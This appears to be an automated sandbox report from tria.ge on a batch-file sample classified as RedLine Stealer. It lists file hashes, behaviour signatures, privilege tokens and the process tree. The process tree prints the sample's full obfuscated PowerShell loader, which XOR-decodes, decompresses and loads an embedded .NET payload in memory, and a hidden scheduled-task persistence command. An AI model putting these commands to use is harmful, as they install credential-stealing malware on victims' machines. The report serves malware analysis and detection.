Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
23s -
max time network
27s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
05/07/2023, 06:25
Static task
static1
Behavioral task
behavioral1
Sample
NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat
Resource
win10v2004-20230703-en
General
-
Target
NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat
-
Size
883KB
-
MD5
a2af610174e71e428e3901160728cfde
-
SHA1
9637079bab94a01e51b0b674418ce9ef37ec94d9
-
SHA256
658291af7d8abb18d30b66c9d283132621f3f403b21a4211ea95ea1358280b02
-
SHA512
69f35d509790717547be19c903a8c4a3ddfaa464d5447ca20e7868b48e0d4223adaa068b8039bbf948344588a6505e9ffad22de14af4045735d1be78ee98688f
-
SSDEEP
24576:5nQ0lF65PDm3oUV83iQ2/x/G06VyN6WSzCjSQY/iuP:5Q0j65PY/YeNJjHY/t
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 4672 startup_str.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 4816 powershell.exe 4816 powershell.exe 4256 powershell.exe 4256 powershell.exe 4672 startup_str.bat.exe 4672 startup_str.bat.exe 2952 powershell.exe 2952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeIncreaseQuotaPrivilege 4816 powershell.exe Token: SeSecurityPrivilege 4816 powershell.exe Token: SeTakeOwnershipPrivilege 4816 powershell.exe Token: SeLoadDriverPrivilege 4816 powershell.exe Token: SeSystemProfilePrivilege 4816 powershell.exe Token: SeSystemtimePrivilege 4816 powershell.exe Token: SeProfSingleProcessPrivilege 4816 powershell.exe Token: SeIncBasePriorityPrivilege 4816 powershell.exe Token: SeCreatePagefilePrivilege 4816 powershell.exe Token: SeBackupPrivilege 4816 powershell.exe Token: SeRestorePrivilege 4816 powershell.exe Token: SeShutdownPrivilege 4816 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeSystemEnvironmentPrivilege 4816 powershell.exe Token: SeRemoteShutdownPrivilege 4816 powershell.exe Token: SeUndockPrivilege 4816 powershell.exe Token: SeManageVolumePrivilege 4816 powershell.exe Token: 33 4816 powershell.exe Token: 34 4816 powershell.exe Token: 35 4816 powershell.exe Token: 36 4816 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeIncreaseQuotaPrivilege 4256 powershell.exe Token: SeSecurityPrivilege 4256 powershell.exe Token: SeTakeOwnershipPrivilege 4256 powershell.exe Token: SeLoadDriverPrivilege 4256 powershell.exe Token: SeSystemProfilePrivilege 4256 powershell.exe Token: SeSystemtimePrivilege 4256 powershell.exe Token: SeProfSingleProcessPrivilege 4256 powershell.exe Token: SeIncBasePriorityPrivilege 4256 powershell.exe Token: SeCreatePagefilePrivilege 4256 powershell.exe Token: SeBackupPrivilege 4256 powershell.exe Token: SeRestorePrivilege 4256 powershell.exe Token: SeShutdownPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeSystemEnvironmentPrivilege 4256 powershell.exe Token: SeRemoteShutdownPrivilege 4256 powershell.exe Token: SeUndockPrivilege 4256 powershell.exe Token: SeManageVolumePrivilege 4256 powershell.exe Token: 33 4256 powershell.exe Token: 34 4256 powershell.exe Token: 35 4256 powershell.exe Token: 36 4256 powershell.exe Token: SeIncreaseQuotaPrivilege 4256 powershell.exe Token: SeSecurityPrivilege 4256 powershell.exe Token: SeTakeOwnershipPrivilege 4256 powershell.exe Token: SeLoadDriverPrivilege 4256 powershell.exe Token: SeSystemProfilePrivilege 4256 powershell.exe Token: SeSystemtimePrivilege 4256 powershell.exe Token: SeProfSingleProcessPrivilege 4256 powershell.exe Token: SeIncBasePriorityPrivilege 4256 powershell.exe Token: SeCreatePagefilePrivilege 4256 powershell.exe Token: SeBackupPrivilege 4256 powershell.exe Token: SeRestorePrivilege 4256 powershell.exe Token: SeShutdownPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeSystemEnvironmentPrivilege 4256 powershell.exe Token: SeRemoteShutdownPrivilege 4256 powershell.exe Token: SeUndockPrivilege 4256 powershell.exe Token: SeManageVolumePrivilege 4256 powershell.exe Token: 33 4256 powershell.exe Token: 34 4256 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2372 wrote to memory of 3856 2372 cmd.exe 80 PID 2372 wrote to memory of 3856 2372 cmd.exe 80 PID 3856 wrote to memory of 4816 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 81 PID 3856 wrote to memory of 4816 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 81 PID 3856 wrote to memory of 4256 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 83 PID 3856 wrote to memory of 4256 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 83 PID 3856 wrote to memory of 4556 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 85 PID 3856 wrote to memory of 4556 3856 NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe 85 PID 4556 wrote to memory of 216 4556 WScript.exe 86 PID 4556 wrote to memory of 216 4556 WScript.exe 86 PID 216 wrote to memory of 4672 216 cmd.exe 88 PID 216 wrote to memory of 4672 216 cmd.exe 88 PID 4672 wrote to memory of 2952 4672 startup_str.bat.exe 89 PID 4672 wrote to memory of 2952 4672 startup_str.bat.exe 89
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe"NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_qqhtM = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NỘI DUNG THUÊ NHÓM ĐĂNG BÀI.bat').Split([Environment]::NewLine);foreach ($_CASH_AEOoF in $_CASH_qqhtM) { if ($_CASH_AEOoF.StartsWith(':: @')) { $_CASH_ZdXkn = $_CASH_AEOoF.Substring(4); break; }; };$_CASH_ZdXkn = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZdXkn, '_CASH_', '');$_CASH_ESBhW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZdXkn);$_CASH_AWnhq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3P6bK+LzjI7DUzZz5IAWC2F46OSMzFByN+j5nJV7ZMY=');for ($i = 0; $i -le $_CASH_ESBhW.Length - 1; $i++) { $_CASH_ESBhW[$i] = ($_CASH_ESBhW[$i] -bxor $_CASH_AWnhq[$i % $_CASH_AWnhq.Length]); };$_CASH_FcYnt = New-Object System.IO.MemoryStream(, $_CASH_ESBhW);$_CASH_woGME = New-Object System.IO.MemoryStream;$_CASH_CdINX = New-Object System.IO.Compression.GZipStream($_CASH_FcYnt, [IO.Compression.CompressionMode]::Decompress);$_CASH_CdINX.CopyTo($_CASH_woGME);$_CASH_CdINX.Dispose();$_CASH_FcYnt.Dispose();$_CASH_woGME.Dispose();$_CASH_ESBhW = $_CASH_woGME.ToArray();$_CASH_aAcgv = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_ESBhW);$_CASH_fNVRV = $_CASH_aAcgv.EntryPoint;$_CASH_fNVRV.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\NỘI DUNG THUÊ NHÓM ĐĂNG BÀI')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Users\Admin\AppData\Roaming\startup_str.bat.exe"startup_str.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_qqhtM = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str.bat').Split([Environment]::NewLine);foreach ($_CASH_AEOoF in $_CASH_qqhtM) { if ($_CASH_AEOoF.StartsWith(':: @')) { $_CASH_ZdXkn = $_CASH_AEOoF.Substring(4); break; }; };$_CASH_ZdXkn = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZdXkn, '_CASH_', '');$_CASH_ESBhW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZdXkn);$_CASH_AWnhq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3P6bK+LzjI7DUzZz5IAWC2F46OSMzFByN+j5nJV7ZMY=');for ($i = 0; $i -le $_CASH_ESBhW.Length - 1; $i++) { $_CASH_ESBhW[$i] = ($_CASH_ESBhW[$i] -bxor $_CASH_AWnhq[$i % $_CASH_AWnhq.Length]); };$_CASH_FcYnt = New-Object System.IO.MemoryStream(, $_CASH_ESBhW);$_CASH_woGME = New-Object System.IO.MemoryStream;$_CASH_CdINX = New-Object System.IO.Compression.GZipStream($_CASH_FcYnt, [IO.Compression.CompressionMode]::Decompress);$_CASH_CdINX.CopyTo($_CASH_woGME);$_CASH_CdINX.Dispose();$_CASH_FcYnt.Dispose();$_CASH_woGME.Dispose();$_CASH_ESBhW = $_CASH_woGME.ToArray();$_CASH_aAcgv = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_ESBhW);$_CASH_fNVRV = $_CASH_aAcgv.EntryPoint;$_CASH_fNVRV.Invoke($null, (, [string[]] ('')))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str')6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2952
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD578b196c176205ce8d776823f669cc56d
SHA10c9f575405ba699f6c019d231e414aaf1629b05b
SHA25622a276913061e60bba8ba609741b9fcc99f4ebdf4261c74a98fc8d5c7a357ed3
SHA51212ecbe5685c2a1cb8ce33dcbfec812387a6cc5d220bdbd0f4347af2185815ca2fa4d01f4abec9b0a811635cdcbd0ecb1d032c86e9da1f18ade90d720f9d8643b
-
Filesize
1KB
MD5f5f268a3d8760169bde3db6e00da5e6c
SHA100dc2443a967bf09147612f53ea5fc6a2cfb0b40
SHA256b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5
SHA512c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e
-
Filesize
1KB
MD5f5f268a3d8760169bde3db6e00da5e6c
SHA100dc2443a967bf09147612f53ea5fc6a2cfb0b40
SHA256b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5
SHA512c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e
-
Filesize
610B
MD5c836276f2feaab8b8c37d45973242280
SHA131e5e4d5ab1985ffab4e34707369f2bf46ade765
SHA256789301f82c63ae7172c8ce1f35442af8cff487e319bc13ea5f17751342211fbc
SHA512e504a6ddf71059faa4e593297b10c5cc60e7877e792237e84967a9ca64aa880122436ed37d971f6f1aa7a2da4f9f97ad89d80ec39e255fb17f4354ce86638f8e
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
883KB
MD5a2af610174e71e428e3901160728cfde
SHA19637079bab94a01e51b0b674418ce9ef37ec94d9
SHA256658291af7d8abb18d30b66c9d283132621f3f403b21a4211ea95ea1358280b02
SHA51269f35d509790717547be19c903a8c4a3ddfaa464d5447ca20e7868b48e0d4223adaa068b8039bbf948344588a6505e9ffad22de14af4045735d1be78ee98688f
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
111B
MD5371257951e09cb56fafbbda4847cbcb7
SHA16d9dab286de574a099f6fe955720a1d87484cea3
SHA256bb77d873388b64bacd10df67a60d012ed4acc5b03b7fa1070584b7133fa371b3
SHA5121dffef10d8f25f6df8db17d09b278701211a40497d3aa8749676aeca3426cdc63232135984e74c8abf73442d917df7288b15d93229d8090684f3acba224f9bc1